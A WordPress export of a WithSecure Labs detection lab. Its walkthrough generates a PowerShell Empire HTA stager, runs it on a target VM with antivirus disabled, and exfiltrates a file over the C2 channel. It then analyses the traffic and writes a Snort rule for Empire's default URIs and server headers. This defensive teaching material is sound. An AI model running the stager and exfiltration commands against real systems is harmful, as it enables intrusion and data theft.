{"id":10546,"date":"2020-07-15T09:00:00","date_gmt":"2020-07-15T08:00:00","guid":{"rendered":"https:\/\/www.withsecure.com\/resources-hub\/w-labs\/attack-detection-fundamentals-c2-and-exfiltration-lab-1\/"},"modified":"2026-05-25T10:21:56","modified_gmt":"2026-05-25T09:21:56","slug":"attack-detection-fundamentals-c2-and-exfiltration-lab-1","status":"publish","type":"lab_item","link":"https:\/\/www.withsecure.com\/de\/ressourcen\/w-labs\/attack-detection-fundamentals-c2-and-exfiltration-lab-1\/","title":{"rendered":"Attack Detection Fundamentals: C2 and Exfiltration &#8211; Lab #1"},"content":{"rendered":"<section\n    class=\"wp-block-one-column-block edwp-block js-wp-block-one-column-block wp-block-one-column-block--content-1 wp-block-one-column-block--meta-sharing layout--spacing-xxxxl-top layout--spacing-xl-bottom\"\n    >\n    <div class=\"wp-block-one-column-block__container\">\n                                                                                                                            <div class='wp-block-one-column-block__meta-sharing-grid'><div class=\"wp-component-content wp-component-content--default wp-block-one-column-block__content fade-in\">\n            <h1 class=\"wp-component-heading text--h2 wp-component-content__title\">\n    Attack Detection Fundamentals: C2 and Exfiltration &#8211; <span class=\"blue-text\">Lab #1<\/span><\/h1>                    <div class=\"wp-component-content__inner\">\n                                                    <div class=\"wp-component-content__meta\">\n                                                                            <span class=\"wp-component-content__meta-categories\">\n                                                                    <span class=\"wp-component-content__meta-category\">\n                                        Attack Detection                                    <\/span>\n                                                                    <span class=\"wp-component-content__meta-category\">\n                                        Data Protection                                    <\/span>\n                                                                    <span class=\"wp-component-content__meta-category\">\n                                        Network Security                                    <\/span>\n                                                            <\/span>\n                                                                                                    <span class=\"wp-component-content__meta-date\">\n                                15 Juli, 2020                            <\/span>\n                                                                    <\/div>\n                                            <\/div>\n                <\/div><section\n    class=\"wp-block-sharing-icons edwp-block wp-block-sharing-icons--disable-border wp-block-sharing-icons--content-1 wp-block-sharing-icons--disable-container wp-block-one-column-block__sharing fade-in wp-block-one-column-block__sharing fade-in\"\n    >\n    <div class=\"wp-block-sharing-icons__container\">\n        <div class=\"wp-block-sharing-icons__inner\">\n                            <p class=\"wp-block-sharing-icons__title fade-in\">\n                    Teilen Sie dies                <\/p>\n                        <div class=\"wp-component-socials wp-component-socials--dark-mode\">\n    \n            <a href=\"https:\/\/www.linkedin.com\/shareArticle?mini=true&#038;url=https:\/\/www.withsecure.com\/de\/ressourcen\/w-labs\/attack-detection-fundamentals-c2-and-exfiltration-lab-1\/&#038;title=Attack%20Detection%20Fundamentals:%20C2%20and%20Exfiltration%20&#8211;%20Lab%20#1\" target=\"_blank\" rel=\"noreferer noopener\" class=\"wp-component-socials__link\" title=\"Auf LinkedIn teilen\">\n            <svg class='edwp-icon edwp-icon--xlg js-icon ' aria-hidden='true'>\n                <use xlink:href='#linkedin'><\/use>\n            <\/svg>        <\/a>\n    \n            <a href=\"http:\/\/x.com\/share?text=Attack Detection Fundamentals: C2 and Exfiltration &#8211; Lab #1&#038;url=https:\/\/www.withsecure.com\/de\/ressourcen\/w-labs\/attack-detection-fundamentals-c2-and-exfiltration-lab-1\/\" target=\"_blank\" rel=\"noreferer noopener\" class=\"wp-component-socials__link wp-component-socials__link--twitter\" title=\"Auf X (Twitter) teilen\">\n            <svg class='edwp-icon edwp-icon--xlg js-icon ' aria-hidden='true'>\n                <use xlink:href='#x'><\/use>\n            <\/svg>        <\/a>\n    \n    \n    <\/div>\n        <\/div>\n    <\/div>\n<\/section>\n<\/div>                                                                                <\/div>\n<\/section>\n\n\n<section\n    class=\"wp-block-one-column-block edwp-block js-wp-block-one-column-block wp-block-one-column-block--content-1 layout--spacing-xxxl-bottom\"\n    >\n    <div class=\"wp-block-one-column-block__container\">\n                                                                                                                                    <div class=\"wp-component-image__wrapper wp-block-one-column-block__image fade-in\">\n                    <figure class=\"wp-component-image__figure\">\n                                            <img loading=\"lazy\" decoding=\"async\" width=\"1200\" height=\"800\" src=\"https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/ws_labs_research2.jpg.webp\" class=\"wp-component-image\n                            wp-component-image--desktop\n                            wp-component-image--mobile\n                            wp-component-image--ratio-content-25-1 wp-component-image--fit-cover\" alt=\"\" srcset=\"https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/ws_labs_research2.jpg.webp 1200w, https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/ws_labs_research2-300x200.jpg.webp 300w, https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/ws_labs_research2-1024x683.jpg.webp 1024w, https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/ws_labs_research2-768x512.jpg.webp 768w, https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/ws_labs_research2-447x298.jpg.webp 447w, https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/ws_labs_research2-219x146.jpg.webp 219w\" sizes=\"auto, (max-width: 1200px) 100vw, 1200px\" \/>                                                    <\/figure>\n                    <\/div>\n                                                                                <\/div>\n<\/section>\n\n\n<section\n    class=\"wp-block-two-column-block edwp-block js-wp-block-two-column-block wp-block-two-column-block--content-1 wp-block-two-column-block__left--align-y-top wp-block-two-column-block__right--align-y-top wp-block-two-column-block--split-sidebar layout--none-top layout--spacing-xxxl-bottom\"\n    data-block-id=\"block_effd6a3f965560e90e101930b2ac0ee6\"\n    >\n    <div class=\"wp-block-two-column-block__container row-load\">\n                                                        <div class=\"wp-block-two-column-block__left\">\n                                    <div class=\"wp-component-authors-list wp-block-two-column-block__authors\">\n                    <p class=\"wp-component-authors-list__title\">\n                Authors            <\/p>\n        \n        <div class=\"wp-component-authors-list__items\">\n                                                <div class=\"wp-component-author-card \">\n    <div class=\"wp-component-author-card__media\">\n                    <span class=\"wp-component-author-card__photo-placeholder\" aria-hidden=\"true\">\n                <svg viewBox=\"0 0 64 64\" role=\"presentation\" focusable=\"false\">\n                    <path d=\"M32 34c-8.1 0-14.7 6.6-14.7 14.7v3.5h29.4v-3.5C46.7 40.6 40.1 34 32 34z\"><\/path>\n                    <path d=\"M32 31.2c6 0 10.9-4.9 10.9-10.9S38 9.4 32 9.4s-10.9 4.9-10.9 10.9S26 31.2 32 31.2z\"><\/path>\n                <\/svg>\n            <\/span>\n            <\/div>\n    <div class=\"wp-component-author-card__content\">\n                    <h3 class=\"wp-component-author-card__name\">Alfie Champion<\/h3>\n        \n                \n            <\/div>\n\n<\/div>\n\n                                                                <div class=\"wp-component-author-card \">\n    <div class=\"wp-component-author-card__media\">\n                    <span class=\"wp-component-author-card__photo-placeholder\" aria-hidden=\"true\">\n                <svg viewBox=\"0 0 64 64\" role=\"presentation\" focusable=\"false\">\n                    <path d=\"M32 34c-8.1 0-14.7 6.6-14.7 14.7v3.5h29.4v-3.5C46.7 40.6 40.1 34 32 34z\"><\/path>\n                    <path d=\"M32 31.2c6 0 10.9-4.9 10.9-10.9S38 9.4 32 9.4s-10.9 4.9-10.9 10.9S26 31.2 32 31.2z\"><\/path>\n                <\/svg>\n            <\/span>\n            <\/div>\n    <div class=\"wp-component-author-card__content\">\n                    <h3 class=\"wp-component-author-card__name\">Derek Stoeckenius<\/h3>\n        \n                \n            <\/div>\n\n<\/div>\n\n                                    <\/div>\n\n            <\/div>\n<nav\n    class=\"wp-component-content-navigation wp-block-two-column-block__content-nav js-content-navigation\"\n    data-bem-base=\"wp-component-content-navigation\"\n    data-nav-column=\"left\"\n    data-nav-type=\"auto\"\n>\n            <p class=\"wp-component-content-navigation__title\">\n            Content        <\/p>\n    \n    <div class=\"wp-component-content-navigation__mobile\">\n        <label class=\"wp-component-content-navigation__mobile-label\">\n            <span class=\"wp-component-content-navigation__mobile-label-text\">\n                Inhaltliche Navigation            <\/span>\n            <select class=\"wp-component-content-navigation__select js-content-navigation-select\">\n                <option value=\"\">\n                    W\u00e4hlen Sie einen Abschnitt                <\/option>\n                            <\/select>\n        <\/label>\n    <\/div>\n\n    <div class=\"wp-component-content-navigation__desktop\">\n        <div class=\"wp-component-content-navigation__list-wrapper\">\n            <span\n                class=\"wp-component-content-navigation__indicator js-content-navigation-indicator\"\n                aria-hidden=\"true\"\n            ><\/span>\n            <ul class=\"wp-component-content-navigation__list js-content-navigation-list\">\n                            <\/ul>\n        <\/div>\n    <\/div>\n<\/nav>\n<section\n    class=\"wp-block-sharing-icons edwp-block wp-block-sharing-icons--disable-border wp-block-sharing-icons--disable-container wp-block-two-column-block__share wp-block-two-column-block__hide-mobile wp-block-two-column-block__share wp-block-two-column-block__hide-mobile\"\n    >\n    <div class=\"wp-block-sharing-icons__container\">\n        <div class=\"wp-block-sharing-icons__inner\">\n                            <p class=\"wp-block-sharing-icons__title fade-in\">\n                    Share this story                <\/p>\n                        <div class=\"wp-component-socials wp-component-socials--dark-mode\">\n    \n            <a href=\"https:\/\/www.linkedin.com\/shareArticle?mini=true&#038;url=https:\/\/www.withsecure.com\/de\/ressourcen\/w-labs\/attack-detection-fundamentals-c2-and-exfiltration-lab-1\/&#038;title=Attack%20Detection%20Fundamentals:%20C2%20and%20Exfiltration%20&#8211;%20Lab%20#1\" target=\"_blank\" rel=\"noreferer noopener\" class=\"wp-component-socials__link\" title=\"Auf LinkedIn teilen\">\n            <svg class='edwp-icon edwp-icon--xlg js-icon ' aria-hidden='true'>\n                <use xlink:href='#linkedin'><\/use>\n            <\/svg>        <\/a>\n    \n            <a href=\"http:\/\/x.com\/share?text=Attack Detection Fundamentals: C2 and Exfiltration &#8211; Lab #1&#038;url=https:\/\/www.withsecure.com\/de\/ressourcen\/w-labs\/attack-detection-fundamentals-c2-and-exfiltration-lab-1\/\" target=\"_blank\" rel=\"noreferer noopener\" class=\"wp-component-socials__link wp-component-socials__link--twitter\" title=\"Auf X (Twitter) teilen\">\n            <svg class='edwp-icon edwp-icon--xlg js-icon ' aria-hidden='true'>\n                <use xlink:href='#x'><\/use>\n            <\/svg>        <\/a>\n    \n    \n    <\/div>\n        <\/div>\n    <\/div>\n<\/section>\n                <\/div>\n                                                <div class=\"wp-block-two-column-block__right\">\n                                <div class=\"wp-component-paragraph wp-block-two-column-block__paragraph \">\n    <p>In the fourth and final part of WithSecure Consulting&#x27;s Attack Detection Fundamentals Workshop series, covering Command and Control (C2) and Exfiltration, we explored a number of attacker techniques for maintaining communication with an implant, blending in with corporate network traffic.<\/p>\n<p>We also explored the detection strategies that can be employed to identify these channels using our own detection stacks, including ways to spot these channels being used for exfiltration. As with previous workshops, the following blog provides a step-by-step guide to recreating the demos from that C2 and Exfiltration workshop, as well as exercises to further the reader&#x27;s understanding of the concepts shown. A recording of the workshop can be found <a href=\"https:\/\/youtu.be\/dHyU0Q32_v8\" target=\"_blank\" rel=\"noopener\">here<\/a>.<\/p>\n<p>In this lab we&#x27;re going to be using PowerShell Empire, a framework that was first <a href=\"https:\/\/www.youtube.com\/watch?v=Pq9t59w0mUI\" target=\"_blank\" rel=\"noopener\">introduced<\/a> in 2015. While no-longer maintained by its original creators, it remains a popular choice for some threat actors. For the purposes of this lab, we&#x27;re going to use a simple HTA payload (as we did in our <a href=\"https:\/\/labs.withsecure.com\/blog\/attack-detection-fundamentals-initial-access-lab-2\/\" target=\"_blank\" rel=\"noopener\">first<\/a> workshop) and observe the network traffic produced with the default traffic profile.<\/p>\n<p>For the purposes of this lab, we&#x27;re going to be producing and analysing packet captures. In a corporate context, you may carry out the same analysis with web proxy logs or, depending on your detection stack, this may be provided by endpoint telemetry (explored in our <a href=\"https:\/\/labs.withsecure.com\/blog\/attack-detection-fundamentals-c2-and-exfiltration-lab-3\/\" target=\"_blank\" rel=\"noopener\">final<\/a> lab). This lab is nice and simple and will only require an attacker VM and our target VM.<\/p>\n<h2>References<\/h2>\n<p><a href=\"https:\/\/github.com\/fireeye\/SilkETW\" target=\"_blank\" rel=\"noopener\">https:\/\/github.com\/fireeye\/SilkETW<\/a><\/p>\n<ul>\n<li><a href=\"https:\/\/github.com\/BC-SECURITY\/Empire\" target=\"_blank\" rel=\"noopener\">PowerShell Empire<\/a><\/li>\n<li><a href=\"https:\/\/www.sans.org\/reading-room\/whitepapers\/incident\/disrupting-empire-identifying-powershell-empire-command-control-activity-38315\" target=\"_blank\" rel=\"noopener\">SANS &#8211; Disrupting Empire: Identifying PowerShell Empire Command and Control Activity<\/a><\/li>\n<\/ul>\n<p>DISCLAIMER: Set up of the tools and the testing environment might not be covered comprehensively within this lab. We will assume basic familiarity with Linux\/Windows command line and the ability of the reader to deploy the necessary frameworks. For that, it is recommended to follow the suggested references for the official tutorials and walkthrough published by the framework&#x27;s author.<\/p>\n<h2>Required Tools<\/h2>\n<ul>\n<li>Wireshark<\/li>\n<li>PowerShell Empire<\/li>\n<li><a href=\"https:\/\/www.snort.org\/\" target=\"_blank\" rel=\"noopener\">Snort<\/a><\/li>\n<li>2x VMs (Disable AV and Firewall)<\/li>\n<\/ul>\n<h2>Walkthrough<\/h2>\n<h3>1 &#8211; Launching Empire<\/h3>\n<p>Launch Empire and you should see the following screen:<\/p>\n<figure><img decoding=\"async\" src=\"https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/empire.png.webp\" alt=\"\" class=\"wp-component-image\" \/><\/figure>\n<p>Ensure a default HTTP listener is configured and active. Then, generate the HTA stager to be executed on the target machine.<\/p>\n<p>To do this, issue the following commands:<\/p>\n<pre><code class=\"language-bash\">listeners\nusestager windows\/hta\nset Listener http\nset Outfile hta_payload.hta\nexecute<\/code><\/pre>\n<p>Transfer the above generated &quot;hta_payload.hta&quot; to the target machine. We can simply double-click this payload to connect back to the attacking machine. A successful payload launch should look like the below.<\/p>\n<figure><img decoding=\"async\" src=\"https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/empire-foothold.png.webp\" alt=\"\" class=\"wp-component-image\" \/><\/figure>\n<p>To interact with the implant on our target machine and exfiltrate files, issue the following commands:<\/p>\n<pre><code class=\"language-bash\">agents\ninteract [name of agent for target machine]\ndownload c:\\[file to exfiltrate]<\/code><\/pre>\n<h3>2 &#8211; Detection<\/h3>\n<p>Now we can review the network traffic generated by our established C2 channel!<\/p>\n<p>Looking at the <a href=\"https:\/\/github.com\/EmpireProject\/Empire\/blob\/e37fb2eef8ff8f5a0a689f1589f424906fe13055\/data\/agent\/agent.ps1#L78\" target=\"_blank\" rel=\"noopener\">code<\/a> for the Empire agent, we can see that by default it will communicate with three URIs, namely:<\/p>\n<ul>\n<li>\/admin\/get.php<\/li>\n<li>\/news.php<\/li>\n<li>\/login\/process.php<\/li>\n<\/ul>\n<p>We can also see a default user agent:<\/p>\n<pre><code class=\"language-bash\">Mozilla\/5.0 (Windows NT 6.1; WOW64; Trident\/7.0; rv:11.0) like Gecko<\/code><\/pre>\n<figure><img decoding=\"async\" src=\"https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/empire-traffic-profile.png.webp\" alt=\"\" class=\"wp-component-image\" \/><\/figure>\n<p>If we turn our attention to the Wireshark packet capture, immediately we can see these URIs in action:<\/p>\n<figure><img decoding=\"async\" src=\"https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/empire-traffic-packet-capture.png.webp\" alt=\"\" class=\"wp-component-image\" \/><\/figure>\n<p>If we follow the TCP stream, as we&#x27;ve done previously, we can take a slightly more detailed look at the traffic. Firstly, we see our default user agent present in the headers of our request. We can also see encrypted data being transmitted within the body of (what would otherwise be plaintext) HTTP requests.<\/p>\n<figure><img decoding=\"async\" src=\"https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/encrypted-body-http.png.webp\" alt=\"\" class=\"wp-component-image\" \/><\/figure>\n<p>As well as our user agent, preset URIs and encrypted HTTP body, we can also see some indicators produced as a result of our data exfiltration.<\/p>\n<figure><img decoding=\"async\" src=\"https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/empire-exfil-post-requests.png.webp\" alt=\"\" class=\"wp-component-image\" \/><\/figure>\n<p>In the TCP stream above, we can see that our Empire server responds to our data exfil POST requests with a &quot;Microsoft-IIS\/7.5&quot; server header (configured <a href=\"https:\/\/github.com\/EmpireProject\/Empire\/blob\/e37fb2eef8ff8f5a0a689f1589f424906fe13055\/lib\/listeners\/http_com.py#L116\" target=\"_blank\" rel=\"noopener\">here<\/a>), and a dummy 404 page (configured <a href=\"https:\/\/github.com\/EmpireProject\/Empire\/blob\/e37fb2eef8ff8f5a0a689f1589f424906fe13055\/lib\/listeners\/http_com.py#L144\" target=\"_blank\" rel=\"noopener\">here<\/a>).<\/p>\n<p>Of course, as with many of the attacker tools we&#x27;ve used throughout these workshops, all of these settings are configurable &#8211; but nevertheless, we can alert upon the presence of these default C2 channels using Snort.<\/p>\n<p>We can use a rule like the below to achieve this:<\/p>\n<pre><code class=\"language-bash\">alert tcp any any -&gt; any any (msg: \u201cPossible Empire activity&quot; ; sid:1000001 ; content:\u201d404\u201d ; http_stat_code; content:\u201dMicrosoft-IIS\/7.5\u201d; http_client_body;)<\/code><\/pre>\n<p>We can test this rule against the PCAP file that we&#x27;ve generated from our packet capture using the following command:<\/p>\n<pre><code class=\"language-bash\">snort -A console -K none -q -r empire.pcap -c empirec2.rule<\/code><\/pre>\n<p>If configured correctly, Snort should output any rule matches to the console, as below:<\/p>\n<pre><code class=\"language-bash\">06\/27-11:29:34.132062  [**] [1:1000001:0] Possible Empire activity [**] [Priority: 0] {TCP} 192.168.1.80:8081 -&gt; 192.168.1.83:51138\n06\/27-11:29:39.211460  [**] [1:1000001:0] Possible Empire activity [**] [Priority: 0] {TCP} 192.168.1.80:8081 -&gt; 192.168.1.83:51139\n06\/27-11:29:44.285743  [**] [1:1000001:0] Possible Empire activity [**] [Priority: 0] {TCP} 192.168.1.80:8081 -&gt; 192.168.1.83:51140<\/code><\/pre>\n<p>It&#x27;s a valuable exercise to review the default behaviours and notable strings used within these frameworks to develop similar detections. While obviously very narrowly focused, they can provide visibility of actors that have, for whatever reason, neglected to customise their tooling.<\/p>\n<p>You could take a look at the <a href=\"https:\/\/github.com\/cobbr\/Covenant\/wiki\/Listener-Profiles\" target=\"_blank\" rel=\"noopener\">traffic profiles<\/a> within Covenant, another framework we&#x27;ve used. See if you can build Snort alerts for that profile, then modify your traffic profile to evade these.<\/p>\n<h2>Conclusions<\/h2>\n<p>In the first lab of our workshop series, we covered the detection opportunities provided by an attacker using PowerShell Empire. We focused on network traffic, evaluating packet captures and the Empire code base to identify Empire&#x27;s URIs, user agent and server response behaviour. We also applied a Snort rule to our packet capture, demonstrating the potential for us to detect this traffic in action.<\/p>\n<p>The main takeaways from this final lab are:<\/p>\n<ul>\n<li>An demonstration of PowerShell Empire and it&#x27;s default traffic profile.<\/li>\n<li>Opportunities to detect HTTP C2 channels based on URIs, encrypted HTTP bodies and user agents.<\/li>\n<li>Use of Snort to produce an alert for Empire traffic based on server response behaviour.<\/li>\n<\/ul>\n<p>Now, let&#x27;s take a look at command and control over <a href=\"https:\/\/labs.withsecure.com\/blog\/attack-detection-fundamentals-c2-and-exfiltration-lab-2\/\" target=\"_blank\" rel=\"noopener\">DNS<\/a>!<\/p>\n<\/div>\n<section\n    class=\"wp-block-sharing-icons edwp-block wp-block-sharing-icons--disable-border wp-block-sharing-icons--disable-container wp-block-two-column-block__share wp-block-two-column-block__mobile-after-right wp-block-two-column-block__share wp-block-two-column-block__mobile-after-right\"\n    >\n    <div class=\"wp-block-sharing-icons__container\">\n        <div class=\"wp-block-sharing-icons__inner\">\n                            <p class=\"wp-block-sharing-icons__title fade-in\">\n                    Share this story                <\/p>\n                        <div class=\"wp-component-socials wp-component-socials--dark-mode\">\n    \n            <a href=\"https:\/\/www.linkedin.com\/shareArticle?mini=true&#038;url=https:\/\/www.withsecure.com\/de\/ressourcen\/w-labs\/attack-detection-fundamentals-c2-and-exfiltration-lab-1\/&#038;title=Attack%20Detection%20Fundamentals:%20C2%20and%20Exfiltration%20&#8211;%20Lab%20#1\" target=\"_blank\" rel=\"noreferer noopener\" class=\"wp-component-socials__link\" title=\"Auf LinkedIn teilen\">\n            <svg class='edwp-icon edwp-icon--xlg js-icon ' aria-hidden='true'>\n                <use xlink:href='#linkedin'><\/use>\n            <\/svg>        <\/a>\n    \n            <a href=\"http:\/\/x.com\/share?text=Attack Detection Fundamentals: C2 and Exfiltration &#8211; Lab #1&#038;url=https:\/\/www.withsecure.com\/de\/ressourcen\/w-labs\/attack-detection-fundamentals-c2-and-exfiltration-lab-1\/\" target=\"_blank\" rel=\"noreferer noopener\" class=\"wp-component-socials__link wp-component-socials__link--twitter\" title=\"Auf X (Twitter) teilen\">\n            <svg class='edwp-icon edwp-icon--xlg js-icon ' aria-hidden='true'>\n                <use xlink:href='#x'><\/use>\n            <\/svg>        <\/a>\n    \n    \n    <\/div>\n        <\/div>\n    <\/div>\n<\/section>\n                <\/div>\n                        <\/div>\n<\/section>\n\n\n<section\n    class=\"wp-block-cta-banner edwp-block js-wp-block-cta-banner wp-block-cta-banner--style-icon wp-block-cta-banner--no-image layout--spacing-xxxl-top layout--spacing-xxxl-bottom\"\n    >\n    <div class=\"wp-block-cta-banner__container\">\n        <div class=\"wp-block-cta-banner__box row-load\">\n            <div class=\"wp-component-content wp-component-content--help-text wp-component-content--dark wp-block-cta-banner__content\">\n                        <div class=\"wp-component-content__inner\">\n                <h2 class=\"wp-component-heading text--h2 wp-component-heading--dark wp-component-content__title\">\n    What <span class=\"blue-text\">next?<\/span><\/h2>                                    <div class=\"wp-component-content__content wysiwyg wysiwyg--dark\">\n                        <div class=\"wp-component-paragraph wp-component-paragraph--dark\">\n    <p class=\"text--p-medium\">Discover WithSecure\u2122 Elements Exposure Management.<br \/>\n&#8211; No credit card required. No obligations.No complexity.<\/p>\n<\/div>\n                    <\/div>\n                            <\/div>\n                            <div class=\"wp-component-content__buttons\">\n                <a class=\"wp-component-button btn btn--primary btn--dark\" href=\"https:\/\/www.withsecure.com\/en\/contact-us\/\">Contact us<\/a>            <\/div>\n                <\/div>                    <\/div>\n    <\/div>\n<\/section>\n\n\n\n\n<section\n    class=\"wp-block-cards edwp-block wp-block-cards--col-3 js-wp-block-cards wp-block-cards--show-overflow wp-block-cards--auto-slides-per-view layout--spacing-xxxl-top layout--spacing-xxxl-bottom\"\n    >\n    <div class=\"wp-block-cards__container\">\n        <div class=\"wp-component-content wp-component-content--default wp-block-cards__content\">\n            <h2 class=\"wp-component-heading text--h2 wp-component-content__title\">\n    Related <span class=\"blue-text\">Labs content<\/span><\/h2>                    <div class=\"wp-component-content__inner\">\n                                    <div class=\"wp-component-content__content wysiwyg\">\n                        <div class=\"wp-component-paragraph \">\n    <p class=\"text--p-medium\"><span data-teams=\"true\">Find related content relating to this topic.<\/span><\/p>\n<\/div>\n                    <\/div>\n                                                            <\/div>\n                <\/div>                            <div\n                class=\"swiper wp-block-cards__swiper js-wp-block-cards-swiper\"\n                data-slides-per-view-desktop=\"auto\"\n                data-slides-per-view-tablet=\"auto\"\n                data-slides-per-view-mobile=\"auto\"\n            >\n                <div class=\"swiper-wrapper wp-block-cards__swiper-wrapper row-load\">\n                                            <div class=\"swiper-slide wp-block-cards__slide\">\n                            <div class=\"wp-component-card-insight wp-block-cards__card wp-component-card-insight--highlighted\">\n    <div class=\"wp-component-card-insight__image-wrapper\">\n        <img loading=\"lazy\" decoding=\"async\" width=\"618\" height=\"440\" src=\"https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/placeholder.jpg.webp\" class=\"wp-component-card-insight__image\" alt=\"\" srcset=\"https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/placeholder.jpg.webp 618w, https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/placeholder-300x214.jpg.webp 300w, https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/placeholder-447x318.jpg.webp 447w, https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/placeholder-205x146.jpg.webp 205w\" sizes=\"auto, (max-width: 618px) 100vw, 618px\" \/>                    <p class=\"wp-component-card-insight__content-type\">W\/Labs<\/p>\n            <\/div>\n    <div class=\"wp-component-card-insight__content\">\n                    <div class=\"wp-component-card-insight__meta\">\n                <div class=\"wp-component-card-insight__categories\">\n                                            <span class=\"wp-component-card-insight__category\">Attack Detection<\/span>\n                                            <span class=\"wp-component-card-insight__category\">Software Protection<\/span>\n                                            <span class=\"wp-component-card-insight__category\">Threat intelligence<\/span>\n                                    <\/div>\n            <\/div>\n                            <h3 class=\"wp-component-card-insight__title\">DarkGate Rises: New version of DarkGate malware hunts like a Duck but bites like a RAT<\/h3>\n                                            <p class=\"wp-component-card-insight__desc\">Source: https:\/\/labs.withsecure.com\/publications\/darkgate-rises<\/p>\n                            <div class=\"wp-component-card-insight__button-wrapper\">\n                <a class=\"wp-component-button btn btn--primary btn--dark wp-component-card-insight__button btn--small\" href=\"https:\/\/www.withsecure.com\/de\/ressourcen\/w-labs\/darkgate-rises\/\">Mehr erfahren<\/a>            <\/div>\n            <\/div>\n<\/div>                        <\/div>\n                                            <div class=\"swiper-slide wp-block-cards__slide\">\n                            <div class=\"wp-component-card-insight wp-block-cards__card\">\n    <div class=\"wp-component-card-insight__image-wrapper\">\n        <img loading=\"lazy\" decoding=\"async\" width=\"618\" height=\"440\" src=\"https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/placeholder.jpg.webp\" class=\"wp-component-card-insight__image\" alt=\"\" srcset=\"https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/placeholder.jpg.webp 618w, https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/placeholder-300x214.jpg.webp 300w, https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/placeholder-447x318.jpg.webp 447w, https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/placeholder-205x146.jpg.webp 205w\" sizes=\"auto, (max-width: 618px) 100vw, 618px\" \/>                    <p class=\"wp-component-card-insight__content-type\">W\/Labs<\/p>\n            <\/div>\n    <div class=\"wp-component-card-insight__content\">\n                    <div class=\"wp-component-card-insight__meta\">\n                <div class=\"wp-component-card-insight__categories\">\n                                            <span class=\"wp-component-card-insight__category\">Attack Detection<\/span>\n                                            <span class=\"wp-component-card-insight__category\">Software Protection<\/span>\n                                            <span class=\"wp-component-card-insight__category\">Threat intelligence<\/span>\n                                    <\/div>\n            <\/div>\n                            <h3 class=\"wp-component-card-insight__title\">Reverse engineering a Lumma infection<\/h3>\n                                            <p class=\"wp-component-card-insight__desc\">Lumma is an information stealer that the WithSecure Detection and Response Team (DRT) have encountered several times. It has seen wider use over the past couple of years, and makes for an interesting threat to monitor.<\/p>\n                            <div class=\"wp-component-card-insight__button-wrapper\">\n                <a class=\"wp-component-button btn btn--primary wp-component-card-insight__button btn--small\" href=\"https:\/\/www.withsecure.com\/de\/ressourcen\/w-labs\/reverse-engineering-a-lumma-infection\/\">Mehr erfahren<\/a>            <\/div>\n            <\/div>\n<\/div>                        <\/div>\n                                            <div class=\"swiper-slide wp-block-cards__slide\">\n                            <div class=\"wp-component-card-insight wp-block-cards__card\">\n    <div class=\"wp-component-card-insight__image-wrapper\">\n        <img loading=\"lazy\" decoding=\"async\" width=\"618\" height=\"440\" src=\"https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/placeholder.jpg.webp\" class=\"wp-component-card-insight__image\" alt=\"\" srcset=\"https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/placeholder.jpg.webp 618w, https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/placeholder-300x214.jpg.webp 300w, https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/placeholder-447x318.jpg.webp 447w, https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/placeholder-205x146.jpg.webp 205w\" sizes=\"auto, (max-width: 618px) 100vw, 618px\" \/>                    <p class=\"wp-component-card-insight__content-type\">W\/Labs<\/p>\n            <\/div>\n    <div class=\"wp-component-card-insight__content\">\n                    <div class=\"wp-component-card-insight__meta\">\n                <div class=\"wp-component-card-insight__categories\">\n                                            <span class=\"wp-component-card-insight__category\">AI security<\/span>\n                                            <span class=\"wp-component-card-insight__category\">Attack Detection<\/span>\n                                            <span class=\"wp-component-card-insight__category\">Software Protection<\/span>\n                                    <\/div>\n            <\/div>\n                            <h3 class=\"wp-component-card-insight__title\">Machine learning-driven malware analysis<\/h3>\n                                            <p class=\"wp-component-card-insight__desc\">With the rapid emergence of new malware variants, accurately classifying and attributing malware samples has become more challenging than ever<\/p>\n                            <div class=\"wp-component-card-insight__button-wrapper\">\n                <a class=\"wp-component-button btn btn--primary wp-component-card-insight__button btn--small\" href=\"https:\/\/www.withsecure.com\/de\/ressourcen\/w-labs\/machine-learning-driven-malware-analysis\/\">Mehr erfahren<\/a>            <\/div>\n            <\/div>\n<\/div>                        <\/div>\n                                    <\/div>\n                <div class=\"wp-block-cards__nav fade-in\">\n                    <div class=\"wp-block-cards__pagination js-wp-block-cards-pagination\">\n                    <\/div>\n                    <div class=\"wp-block-cards__nav-arrow js-wp-block-cards-nav-prev\">\n                        <svg class='edwp-icon edwp-icon--reg js-icon ' aria-hidden='true'>\n                <use xlink:href='#chevron'><\/use>\n            <\/svg>                    <\/div>\n                    <div class=\"wp-block-cards__nav-arrow js-wp-block-cards-nav-next\">\n                        <svg class='edwp-icon edwp-icon--reg js-icon ' aria-hidden='true'>\n                <use xlink:href='#chevron'><\/use>\n            <\/svg>                    <\/div>\n                <\/div>\n            <\/div>\n                                    <\/div>\n<\/section>\n","protected":false},"excerpt":{"rendered":"<p>In this lab we&#8217;re going to be using PowerShell Empire, a framework that was first introduced in 2015. While 